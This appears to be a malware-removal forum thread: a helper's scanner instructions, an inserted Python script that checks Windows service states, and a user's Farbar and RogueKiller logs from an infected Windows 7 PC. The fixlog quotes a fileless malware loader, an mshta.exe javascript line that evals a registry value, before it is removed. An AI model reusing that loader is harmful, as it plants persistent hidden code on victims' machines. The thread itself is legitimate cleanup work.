http://www.bleepingcomputer.com/download/farbar-service-scanner/dl/62/
and Save to your Desktop.
If using Windows 7 or above, Right-Click on fss.exe and select Run As Administrator.
If using XP, double-click to start.
Answer Yes to ok when prompted.
If your firewall then puts out a prompt, again, allow it to run.
Once FSS is on-screen, be sure the following items are checkmarked:
Internet Services
Windows Firewall
System Restore
Security Center/Action Center
Windows Update
Windows Defender


Click on "Scan".
It will create a log (FSS.txt) in the same directory the tool is run.
Copy & Paste contents of FSS.txt into your reply.
===

Run the Farbar program and post only the FRST.txt log.

Please let me know what problem persists with this computer.
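
Added example, not part of the thread and not code from FRST or FSS: a small Python triage of the `sc qc` / `sc queryex` output that the fixlist above requests, flagging core services whose start type differs from the expected one or that were never started since boot. The baseline table, the function names and the sample text are assumptions made for this illustration; the sample is constructed in the format `sc` prints.

```python
import re

# Assumed baseline for the five services the fixlist queries: all of them
# normally start automatically on Windows 7. Adjust for other systems.
EXPECTED_START = {
    "winmgmt": "AUTO_START",
    "rpcss": "AUTO_START",
    "rpceptmapper": "AUTO_START",
    "dcomlaunch": "AUTO_START",
    "bfe": "AUTO_START",
}

# Win32 error 1077 (0x435): no attempt to start the service since the last boot.
NEVER_STARTED = 1077

# "KEY : value" lines; empty values, banners, flag lists in parentheses and
# DEPENDENCIES continuation lines (which have no key) are skipped.
FIELD = re.compile(r"^\s*([A-Z0-9_]+)\s*:\s*(\S.*?)\s*$")

# Constructed sample: one tampered service and one healthy service.
SAMPLE = r"""
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: winmgmt
        TYPE               : 20  WIN32_SHARE_PROCESS
        START_TYPE         : 4   DISABLED
        BINARY_PATH_NAME   : C:\Windows\system32\svchost.exe -k netsvcs
        LOAD_ORDER_GROUP   :
        DEPENDENCIES       : RPCSS

SERVICE_NAME: winmgmt
        TYPE               : 20  WIN32_SHARE_PROCESS
        STATE              : 1  STOPPED
        WIN32_EXIT_CODE    : 1077  (0x435)
        PID                : 0

SERVICE_NAME: rpcss
        TYPE               : 20  WIN32_SHARE_PROCESS
        STATE              : 4  RUNNING
                                (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)

SERVICE_NAME: rpcss
        START_TYPE         : 2   AUTO_START
        DEPENDENCIES       : RpcEptMapper
                           : DcomLaunch
"""


def parse_sc_output(text):
    """Merge every sc qc / sc queryex block into {service: {field: value}}."""
    services, current = {}, None
    for line in text.splitlines():
        match = FIELD.match(line)
        if not match:
            continue
        key, value = match.groups()
        if key == "SERVICE_NAME":
            # Service names are case-insensitive (rpcss, RpcSs, RPCSS).
            current = services.setdefault(value.lower(), {})
        elif current is not None:
            current[key] = value
    return services


def _label(value):
    """Return the symbolic part of a value such as '4   DISABLED'."""
    parts = value.split()
    return parts[1] if len(parts) > 1 else None


def triage(text, expected=EXPECTED_START):
    """Return (service, problem) tuples, sorted by service name."""
    findings = []
    for name, fields in sorted(parse_sc_output(text).items()):
        start = _label(fields.get("START_TYPE", ""))
        state = _label(fields.get("STATE", ""))
        exit_code = fields.get("WIN32_EXIT_CODE", "").split()
        want = expected.get(name)
        if want and start and start != want:
            findings.append((name, f"start type {start}, expected {want}"))
        if state == "STOPPED" and exit_code and exit_code[0] == str(NEVER_STARTED):
            findings.append(
                (name, f"stopped with exit code {NEVER_STARTED} (ERROR_SERVICE_NEVER_STARTED)")
            )
    return findings


if __name__ == "__main__":
    for service, problem in triage(SAMPLE):
        print(f"{service}: {problem}")
```

A service that is both disabled and reports 1077 was switched off before the current boot rather than crashing afterwards, which matters when deciding whether re-enabling the start type is enough.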

#5 mortn

mortn
  • Topic Starter

  • Members
  • 16 posts
  • OFFLINE
  •  
  • Local time:08:09 PM

Posted 19 March 2018 - 02:48 PM

Hello again!

I've completed the four steps you instructed me to do. I still get the "Failed to update(1)" prompt when launching FRST, but other than that, the progress appeared to run smoothly. It does seem like most processes and startups are disabled, but I'm guessing that is part of the process. Here are the four logs you asked for (fixlog, ReportRogue, FSS, and FRST):

 

 

Fix result of Farbar Recovery Scan Tool (x64) Version: 14.03.2018
Ran by Martin (19-03-2018 19:52:22) Run:2
Running from D:\User profile\Desktop
Loaded Profiles: Martin (Available Profiles: Martin)
Boot Mode: Normal
==============================================

fixlist content:
*****************
Start

CreateRestorePoint:
CloseProcesses:

U3 ayj9xjuk; C:\Windows\System32\Drivers\ayj9xjuk.sys [0 ] (Microsoft Corporation) <==== ATTENTION (zero byte File/Folder)
C:\Windows\System32\Drivers\ayj9xjuk.sys

HKU\.DEFAULT\Software\Classes\3d878: "C:\Windows\system32\mshta.exe" "javascript:Qy2pqhd8="cGnOVdL4";bu1=new ActiveXObject("WScript.Shell");s7Wb7IoYn="JcVXE";HAb4P=bu1.RegRead("HKCU\\software\\dovquskjdo\\thbfcp");Z9MeKir="h8c665I";eval(HAb4P);d0jSmzjo4="b4pkxh7";" <==== ATTENTION
MSCONFIG\startupreg: Salus => C:\Program Files (x86)\f552dd4c52e3\b786bdb3c67d.exe
C:\Program Files (x86)\f552dd4c52e3\b786bdb3c67d.exe

cmd: ipconfig /flushdns
cmd: IPCONFIG /release
cmd: IPCONFIG /renew

cmd: sc qc winmgmt
cmd: sc queryex winmgmt
cmd: sc queryex rpcss
cmd: sc qc rpcss
cmd: sc queryex RpcEptMapper
cmd: sc qc RpcEptMapper
cmd: sc queryex DcomLaunch
cmd: sc qc DcomLaunch
cmd: sc queryex bfe
cmd: sc qc bfe

End
*****************

Error: (0) Failed to create a restore point.
Processes closed successfully.
ayj9xjuk => service not found.
"C:\Windows\System32\Drivers\ayj9xjuk.sys" => not found
"HKU\.DEFAULT\Software\Classes\3d878" => removed successfully
"HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\Salus" => removed successfully
"C:\Program Files (x86)\f552dd4c52e3\b786bdb3c67d.exe" => not found

========= ipconfig /flushdns =========


Windows IP Configuration

Could not flush the DNS Resolver Cache: Function failed during execution.


========= End of CMD: =========


========= IPCONFIG /release =========


Windows IP Configuration

No operation can be performed on Tunngle while it has its media disconnected.
An error occurred while releasing interface Local Area Connection : The RPC server is unavailable.


========= End of CMD: =========


========= IPCONFIG /renew =========


Windows IP Configuration

No operation can be performed on Tunngle while it has its media disconnected.
An error occurred while renewing interface Local Area Connection : The RPC server is unavailable.
 

========= End of CMD: =========


========= sc qc winmgmt =========

[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: winmgmt
        TYPE               : 20  WIN32_SHARE_PROCESS
        START_TYPE         : 4   DISABLED
        ERROR_CONTROL      : 0   IGNORE
        BINARY_PATH_NAME   : C:\Windows\system32\svchost.exe -k netsvcs
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Windows Management Instrumentation
        DEPENDENCIES       : RPCSS
        SERVICE_START_NAME : localSystem

========= End of CMD: =========


========= sc queryex winmgmt =========


SERVICE_NAME: winmgmt
        TYPE               : 20  WIN32_SHARE_PROCESS  
        STATE              : 1  STOPPED
        WIN32_EXIT_CODE    : 1077  (0x435)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0
        PID                : 0
        FLAGS              :

========= End of CMD: =========


========= sc queryex rpcss =========


SERVICE_NAME: rpcss
        TYPE               : 20  WIN32_SHARE_PROCESS  
        STATE              : 4  RUNNING
                                (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0
        PID                : 912
        FLAGS              :

========= End of CMD: =========


========= sc qc rpcss =========

[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: rpcss
        TYPE               : 20  WIN32_SHARE_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Windows\system32\svchost.exe -k rpcss
        LOAD_ORDER_GROUP   : COM Infrastructure
        TAG                : 0
        DISPLAY_NAME       : Remote Procedure Call (RPC)
        DEPENDENCIES       : RpcEptMapper
                           : DcomLaunch
        SERVICE_START_NAME : NT AUTHORITY\NetworkService

========= End of CMD: =========


========= sc queryex RpcEptMapper =========


SERVICE_NAME: RpcEptMapper
        TYPE               : 20  WIN32_SHARE_PROCESS  
        STATE              : 4  RUNNING
                                (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0
        PID                : 912
        FLAGS              :

========= End of CMD: =========


========= sc qc RpcEptMapper =========

[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: RpcEptMapper
        TYPE               : 20  WIN32_SHARE_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Windows\system32\svchost.exe -k RPCSS
        LOAD_ORDER_GROUP   : COM Infrastructure
        TAG                : 0
        DISPLAY_NAME       : RPC Endpoint Mapper
        DEPENDENCIES       :
        SERVICE_START_NAME : NT AUTHORITY\NetworkService

========= End of CMD: =========


========= sc queryex DcomLaunch =========


SERVICE_NAME: DcomLaunch
        TYPE               : 20  WIN32_SHARE_PROCESS  
        STATE              : 4  RUNNING
                                (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0
        PID                : 844
        FLAGS              :

========= End of CMD: =========


========= sc qc DcomLaunch =========

[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: DcomLaunch
        TYPE               : 20  WIN32_SHARE_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Windows\system32\svchost.exe -k DcomLaunch
        LOAD_ORDER_GROUP   : COM Infrastructure
        TAG                : 0
        DISPLAY_NAME       : DCOM Server Process Launcher
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

========= End of CMD: =========


========= sc queryex bfe =========


SERVICE_NAME: bfe
        TYPE               : 20  WIN32_SHARE_PROCESS  
        STATE              : 1  STOPPED
        WIN32_EXIT_CODE    : 1077  (0x435)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0
        PID                : 0
        FLAGS              :

========= End of CMD: =========


========= sc qc bfe =========

[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: bfe
        TYPE               : 20  WIN32_SHARE_PROCESS
        START_TYPE         : 4   DISABLED
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
        LOAD_ORDER_GROUP   : NetworkProvider
        TAG                : 0
        DISPLAY_NAME       : Base Filtering Engine
        DEPENDENCIES       : RpcSs
        SERVICE_START_NAME : NT AUTHORITY\LocalService

========= End of CMD: =========



The system needed a reboot.

==== End of Fixlog 19:52:23 ====

 

 

 

RogueKiller V12.12.9.0 (x64) [Mar 19 2018] (Free) by Adlice Software
mail : http://www.adlice.com/contact/
Feedback : https://forum.adlice.com
Website : http://www.adlice.com/download/roguekiller/
Blog : http://www.adlice.com

Operating System : Windows 7 (6.1.7601 Service Pack 1) 64 bits version
Started in : Normal mode
User : Martin [Administrator]
Started from : C:\Program Files\RogueKiller\RogueKiller64.exe
Mode : Scan -- Date : 03/19/2018 19:58:30 (Duration : 00:28:38)
Switches : -refid

¤¤¤ Processes : 0 ¤¤¤

¤¤¤ Registry : 6 ¤¤¤
[Suspicious.Path] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules | TCP Query User{C02949D8-6746-4BCF-956E-4B55C69F0F0C}C:\users\martin\appdata\roaming\gameranger\gameranger\gameranger.exe : v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=6|Profile=Private|App=C:\users\martin\appdata\roaming\gameranger\gameranger\gameranger.exe|Name=gameranger.exe|Desc=gameranger.exe|Defer=User| [7] -> Found
[Suspicious.Path] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules | UDP Query User{70FBBFBB-B33D-4CC7-94F3-4A41468DFDC9}C:\users\martin\appdata\roaming\gameranger\gameranger\gameranger.exe : v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=17|Profile=Private|App=C:\users\martin\appdata\roaming\gameranger\gameranger\gameranger.exe|Name=gameranger.exe|Desc=gameranger.exe|Defer=User| [7] -> Found
[Suspicious.Path] (X64) HKEY_LOCAL_MACHINE\System\ControlSet002\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules | TCP Query User{C02949D8-6746-4BCF-956E-4B55C69F0F0C}C:\users\martin\appdata\roaming\gameranger\gameranger\gameranger.exe : v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=6|Profile=Private|App=C:\users\martin\appdata\roaming\gameranger\gameranger\gameranger.exe|Name=gameranger.exe|Desc=gameranger.exe|Defer=User| [7] -> Found
[Suspicious.Path] (X64) HKEY_LOCAL_MACHINE\System\ControlSet002\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules | UDP Query User{70FBBFBB-B33D-4CC7-94F3-4A41468DFDC9}C:\users\martin\appdata\roaming\gameranger\gameranger\gameranger.exe : v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=17|Profile=Private|App=C:\users\martin\appdata\roaming\gameranger\gameranger\gameranger.exe|Name=gameranger.exe|Desc=gameranger.exe|Defer=User| [7] -> Found
[PUM.StartMenu] (X64) HKEY_USERS\S-1-5-21-1755371218-3412237994-1746218496-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowMyGames : 0  -> Found
[PUM.StartMenu] (X86) HKEY_USERS\S-1-5-21-1755371218-3412237994-1746218496-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowMyGames : 0  -> Found

¤¤¤ Tasks : 1 ¤¤¤
[Hj.Shortcut] \{8D7BD5CC-F762-4C88-83D1-6E0E6114373E} -- "c:\program files (x86)\mozilla firefox\firefox.exe" (http://ui.skype.com/ui/0/7.7.0.103/nl/abandoninstall?page=tsPlugin) -> Found

¤¤¤ Files : 1 ¤¤¤
[Root.Wajam][File] C:\Windows\System32\drivers\ddd6ebd91f4ecf7d7f74107288edb1a0.sys -> Found

¤¤¤ WMI : 0 ¤¤¤

¤¤¤ Hosts File : 0 ¤¤¤

¤¤¤ Antirootkit : 0 (Driver: Loaded) ¤¤¤

¤¤¤ Web browsers : 0 ¤¤¤

¤¤¤ MBR Check : ¤¤¤
+++++ PhysicalDrive0:  +++++
--- User ---
[MBR] 49c75b6e74d82306bd948cabb7e68932
[BSP] b534b12d3a8c97cb62514c1a63434e15 : Windows Vista/7/8 MBR Code
Partition table:
0 - [ACTIVE] NTFS (0x7) [VISIBLE] Offset (sectors): 2048 | Size: 100 MB [Windows Vista/7/8 Bootstrap | Windows Vista/7/8 Bootloader]
1 - [XXXXXX] NTFS (0x7) [VISIBLE] Offset (sectors): 206848 | Size: 244096 MB [Windows Vista/7/8 Bootstrap | Windows Vista/7/8 Bootloader]
User = LL1 ... OK
User = LL2 ... OK

+++++ PhysicalDrive1:  +++++
--- User ---
[MBR] 57e59b910ab560f6a40c1550948d86a9
[BSP] d8232796e7a9b75e04c7f42f5b6b1192 : Windows Vista/7/8 MBR Code
Partition table:
0 - [XXXXXX] NTFS (0x7) [VISIBLE] Offset (sectors): 2048 | Size: 1907727 MB [Windows Vista/7/8 Bootstrap | Windows Vista/7/8 Bootloader]
User = LL1 ... OK
User = LL2 ... OK

 

Farbar Service Scanner Version: 27-01-2016
Ran by Martin (administrator) on 19-03-2018 at 20:34:27
Running from "D:\User profile\Desktop"
Windows 7 Ultimate Service Pack 1 (X64)
Boot Mode: Normal
****************************************************************

Internet Services:
============
Dnscache Service is not running. Checking service configuration:
The start type of Dnscache service is set to Disabled. The default start type is Auto.
The ImagePath of Dnscache service is OK.
The ServiceDll of Dnscache service is OK.

Dhcp Service is not running. Checking service configuration:
The start type of Dhcp service is set to Disabled. The default start type is Auto.
The ImagePath of Dhcp service is OK.
The ServiceDll of Dhcp service is OK.

Nsi Service is not running. Checking service configuration:
The start type of Nsi service is set to Disabled. The default start type is Auto.
The ImagePath of Nsi service is OK.
The ServiceDll of Nsi service is OK.


Connection Status:
==============
Attempt to access Local Host IP returned error: Localhost is blocked: Other errors
LAN connected.
Attempt to access Google IP returned error. Other errors
Attempt to access Google.com returned error: Other errors
Attempt to access Yahoo.com returned error: Other errors


Windows Firewall:
=============
mpsdrv Service is not running. Checking service configuration:
The start type of mpsdrv service is OK.
The ImagePath of mpsdrv service is OK.

MpsSvc Service is not running. Checking service configuration:
The start type of MpsSvc service is set to Disabled. The default start type is Auto.
The ImagePath of MpsSvc service is OK.
The ServiceDll of MpsSvc service is OK.

bfe Service is not running. Checking service configuration:
The start type of bfe service is set to Disabled. The default start type is Auto.
The ImagePath of bfe service is OK.
The ServiceDll of bfe service is OK.


Firewall Disabled Policy:
==================


System Restore:
============
SDRSVC Service is not running. Checking service configuration:
The start type of SDRSVC service is set to Disabled. The default start type is 3.
The ImagePath of SDRSVC service is OK.
The ServiceDll of SDRSVC service is OK.

VSS Service is not running. Checking service configuration:
The start type of VSS service is set to Disabled. The default start type is 3.
The ImagePath of VSS service is OK.


System Restore Policy:
========================


Action Center:
============

wscsvc Service is not running. Checking service configuration:
The start type of wscsvc service is set to Disabled. The default start type is Auto.
The ImagePath of wscsvc service is OK.
The ServiceDll of wscsvc service is OK.

winmgmt Service is not running. Checking service configuration:
The start type of winmgmt service is set to Disabled. The default start type is Auto.
The ImagePath of winmgmt: "%systemroot%\system32\svchost.exe -k netsvcs".
The ServiceDll of winmgmt service is OK.


Windows Update:
============
wuauserv Service is not running. Checking service configuration:
The start type of wuauserv service is set to Disabled. The default start type is Auto.
The ImagePath of wuauserv service is OK.
The ServiceDll of wuauserv service is OK.

BITS Service is not running. Checking service configuration:
The start type of BITS service is set to Disabled. The default start type is Auto.
The ImagePath of BITS service is OK.
The ServiceDll of BITS service is OK.

EventSystem Service is not running. Checking service configuration:
The start type of EventSystem service is set to Disabled. The default start type is Auto.
The ImagePath of EventSystem service is OK.
The ServiceDll of EventSystem service is OK.


Windows Autoupdate Disabled Policy:
============================


Windows Defender:
==============
WinDefend Service is not running. Checking service configuration:
The start type of WinDefend service is set to Disabled. The default start type is Auto.
The ImagePath of WinDefend service is OK.
The ServiceDll of WinDefend service is OK.


Windows Defender Disabled Policy:
==========================
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender]
"DisableAntiSpyware"=DWORD:1


Other Services:
==============


File Check:
========
C:\Windows\System32\nsisvc.dll => File is digitally signed
C:\Windows\System32\drivers\nsiproxy.sys => File is digitally signed
C:\Windows\System32\dhcpcore.dll => File is digitally signed
C:\Windows\System32\drivers\afd.sys => File is digitally signed
C:\Windows\System32\drivers\tdx.sys => File is digitally signed
C:\Windows\System32\Drivers\tcpip.sys => File is digitally signed
C:\Windows\System32\dnsrslvr.dll => File is digitally signed
C:\Windows\System32\dnsapi.dll => File is digitally signed
C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed
C:\Windows\System32\mpssvc.dll => File is digitally signed
C:\Windows\System32\bfe.dll => File is digitally signed
C:\Windows\System32\drivers\mpsdrv.sys => File is digitally signed
C:\Windows\System32\SDRSVC.dll => File is digitally signed
C:\Windows\System32\vssvc.exe => File is digitally signed
C:\Windows\System32\wscsvc.dll => File is digitally signed
C:\Windows\System32\wbem\WMIsvc.dll => File is digitally signed
C:\Windows\System32\wuaueng.dll => File is digitally signed
C:\Windows\System32\qmgr.dll => File is digitally signed
C:\Windows\System32\es.dll => File is digitally signed
C:\Windows\System32\cryptsvc.dll => File is digitally signed
C:\Program Files\Windows Defender\MpSvc.dll => File is digitally signed
C:\Windows\System32\svchost.exe => File is digitally signed
C:\Windows\System32\rpcss.dll => File is digitally signed


**** End of log ****

 

 

 

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 14.03.2018
Ran by Martin (administrator) on OVERLORD (19-03-2018 20:35:54)
Running from D:\User profile\Desktop
Loaded Profiles: Martin (Available Profiles: Martin)
Platform: Windows 7 Ultimate Service Pack 1 (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: Chrome)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(Microsoft Corporation) C:\Program Files\Microsoft Security Client\MsMpEng.exe
() C:\Windows\SysWOW64\PnkBstrA.exe
() C:\Windows\SysWOW64\PnkBstrB.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.33.7\GoogleCrashHandler.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.33.7\GoogleCrashHandler64.exe

==================== Registry (Whitelisted) ===========================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

BootExecute: autocheck autochk * sdnclean64.exe

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Tcpip\..\Interfaces\{458E592A-DE20-42E8-8C67-65C88F2A797D}: [DhcpNameServer] 192.168.1.1

Internet Explorer:
==================
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page =
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL =
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL =
HKLM\Software\Microsoft\Internet Explorer\Main,Local Page =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Local Page =
HKU\S-1-5-21-1755371218-3412237994-1746218496-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://go.microsoft.com/fwlink/?LinkID=617911&ResetID=131643942694512768&GUID=72AA9CAC-BF0C-4EEC-B561-2B576365F905
HKU\S-1-5-21-1755371218-3412237994-1746218496-1000\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = hxxp://se.msn.com/?ocid=iehp
BHO: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office\Office15\OCHelper.dll [2017-12-12] (Microsoft Corporation)
BHO: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre6\bin\ssv.dll [2014-02-01] (Sun Microsystems, Inc.)
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2009-08-18] (Microsoft Corporation)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office15\URLREDIR.DLL [2014-01-23] (Microsoft Corporation)
BHO: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre6\bin\jp2ssv.dll [2014-02-01] (Sun Microsystems, Inc.)
BHO-x32: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2009-08-18] (Microsoft Corporation)
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office15\URLREDIR.DLL [2014-01-22] (Microsoft Corporation)
BHO-x32: Microsoft SkyDrive Pro Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files (x86)\Microsoft Office\Office15\GROOVEEX.DLL [2017-02-23] (Microsoft Corporation)
DPF: HKLM-x32 {7530BFB8-7293-4D34-9923-61A11451AFC5} hxxp://download.eset.com/special/eos/OnlineScanner.cab
Handler: osf - {D924BDC6-C83A-4BD5-90D0-095128A113D1} - C:\Program Files\Microsoft Office\Office15\MSOSB.DLL [2017-08-15] (Microsoft Corporation)

FireFox:
========
FF DefaultProfile: 9am9eglk.default
FF ProfilePath: C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default [2018-03-19]
FF Homepage: Mozilla\Firefox\Profiles\9am9eglk.default -> hxxps://www.malwarebytes.org/restorebrowser/
FF Extension: (Auto Refresh) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\autorefresh@plugin.xpi [2016-04-28] [Legacy]
FF Extension: (bug643770(Stop Autoscroll by mouse wheel)) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\bug643770@alice0775.xpi [2016-04-28] [Legacy]
FF Extension: (Extra Padding When Maximized) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\extrapadding@digitaldj.net.xpi [2016-04-28] [Legacy]
FF Extension: (Paste and Go Hotkey (Keyboard Shortcut)) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\FxExtPasteNGoHtk@github.lostdj.xpi [2016-04-27] [Legacy]
FF Extension: (Gif Delayer) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\jid1-mqCpKcAruymyAA@jetpack.xpi [2016-04-27] [Legacy]
FF Extension: (YouTube ALL HTML5) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\jid1-qj0w91o64N7Eeg@jetpack.xpi [2017-08-29] [Legacy]
FF Extension: ("Manage search engines" button) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\jid1-XGhxOf1M8UPpsQ@jetpack.xpi [2017-09-12] [Legacy]
FF Extension: (No Close Buttons) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\no-close-buttons@xavamedia.nl.xpi [2016-11-02] [Legacy]
FF Extension: (Secure Login) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\secureLogin@blueimp.net.xpi [2017-02-25] [Legacy]
FF Extension: (Super Start) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\superstart@enjoyfreeware.org [2015-12-05] [Legacy]
FF Extension: (Tab Deque) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\tabdeque@sblask.xpi [2017-11-26]
FF Extension: (Tab Kit - Mouse Gestures) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\tabkit.mouse-gestures@pikachuexe.amateur.hk.xpi [2017-03-05] [Legacy]
FF Extension: (uBlock Origin) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\uBlock0@raymondhill.net.xpi [2018-01-15]
FF Extension: (Undo Closed Tabs Button) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\undoclosedtabsbutton@supernova00.biz.xpi [2016-08-26] [Legacy]
FF Extension: (Zotero Connector) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\zotero@chnm.gmu.edu.xpi [2017-12-14]
FF Extension: (Zotero Word for Windows Integration) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\zoteroWinWordIntegration@zotero.org [2016-10-15] [Legacy]
FF Extension: (uBlock) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\{2b10c1c8-a11f-4bad-fe9c-1c11e82cac42}.xpi [2015-12-05] [Legacy]
FF Extension: (FT DeepDark) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\{77d2ed30-4cd2-11e0-b8af-0800200c9a66} [2017-10-17] [Legacy]
FF Extension: (All-in-One Gestures) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\{8b86149f-01fb-4842-9dd8-4d7eb02fd055} [2016-04-27] [Legacy]
FF Extension: (Single Key Tab Switch) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\{a66191d8-898b-4a66-89be-d5b279477a54}.xpi [2015-12-31] [Legacy]
FF Extension: (LeechBlock) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\{a95d8332-e4b4-6e7f-98ac-20b733364387} [2017-11-15] [Legacy]
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_28_0_0_161.dll [2018-02-06] ()
FF Plugin: @java.com/DTPlugin,version=1.6.0_45 -> C:\Windows\system32\npdeployJava1.dll [2014-02-01] (Sun Microsystems, Inc.)
FF Plugin: @java.com/JavaPlugin -> C:\Program Files\Java\jre6\bin\plugin2\npjp2.dll [2014-02-01] (Sun Microsystems, Inc.)
